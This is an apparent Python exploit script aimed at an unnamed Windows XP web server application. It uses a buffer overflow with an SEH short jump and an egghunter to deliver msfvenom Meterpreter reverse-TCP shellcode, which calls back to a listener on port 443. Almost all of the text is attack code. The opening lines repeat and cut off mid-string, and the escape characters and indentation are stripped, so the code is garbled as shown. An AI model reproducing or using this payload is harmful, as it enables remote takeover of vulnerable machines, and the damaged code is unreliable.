# Tested on Windows XP SP3 (x86)
# The application requires to have the web server enabled.

#!/usr/bin/python
import socket, threading, struct

host = "192.1 # Tested on Windows XP SP3 (x86)
# The application requires to have the web server enabled.

#!/usr/bin/python
import socket, threading, struct

host = "192.168.228.155"
port = 80

def send_egghunter_request():

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.158 LPORT=443 -f py
buf = "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
buf += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
buf += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
buf += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
buf += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
buf += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
buf += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
buf += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
buf += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
buf += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
buf += "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"
buf += "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"
buf += "x90x01x00x00x29xc4x54x50x68x29x80x6bx00"
buf += "xffxd5x6ax0ax68xc0xa8xe4x9ex68x02x00x01"
buf += "xbbx89xe6x50x50x50x50x40x50x40x50x68xea"
buf += "x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
buf += "x74x61xffxd5x85xc0x74x0axffx4ex08x75xec"
buf += "xe8x61x00x00x00x6ax00x6ax04x56x57x68x02"
buf += "xd9xc8x5fxffxd5x83xf8x00x7ex36x8bx36x6a"
buf += "x40x68x00x10x00x00x56x6ax00x68x58xa4x53"
buf += "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9"
buf += "xc8x5fxffxd5x83xf8x00x7dx22x58x68x00x40"
buf += "x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57"
buf += "x68x75x6ex4dx61xffxd5x5ex5exffx0cx24xe9"
buf += "x71xffxffxffx01xc3x29xc6x75xc7xc3xbbxf0"
buf += "xb5xa2x56x6ax00x53xffxd5"

egghunter = "W00T" * 2
egghunter += "x90" * 16 # Padding
egghunter += buf
egghunter += "x42" * (100000 - len(egghunter))
content_length = len(egghunter) + 1000 # Just 1000 padding.

egghunter_request = "POST / HTTP/1.1 "
egghunter_request += "Content-Type: multipart/form-data; boundary=evilBoundary "
egghunter_request += "Content-Length: " + str(content_length) + " "
egghunter_request += " "
egghunter_request += egghunter

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(egghunter_request)
s.recv(1024)
s.close()

def send_exploit_request():

buffer = "x90" * 2495
buffer += "xebx06x90x90" # short jump
buffer += struct.pack("<L", 0x1014fdef) # POP ESI; POP EBX; RETN - libspp

# ./egghunter.rb -b "x00x0ax0b" -e "W00T" -f py
buffer += "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3c"
buffer += "x05x5ax74xefxb8x57x30x30x54x89xd7xafx75"
buffer += "xeaxafx75xe7xffxe7"
buffer += "x41" * (6000 - len(buffer))

#HTTP Request
request = "GET /" + buffer + "HTTP/1.1" + " "
request += "Host: " + host + " "
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + " "
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + " "
request += "Accept-Language: en-US,en;q=0.5" + " "
request += "Accept-Encoding: gzip, deflate" + " "
request += "Connection: keep-alive" + " "

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)
s.close()

if __name__ == "__main__":

t = threading.Thread(target=send_egghunter_request)
t.start()
print "[+] Thread started."
send_exploit_request()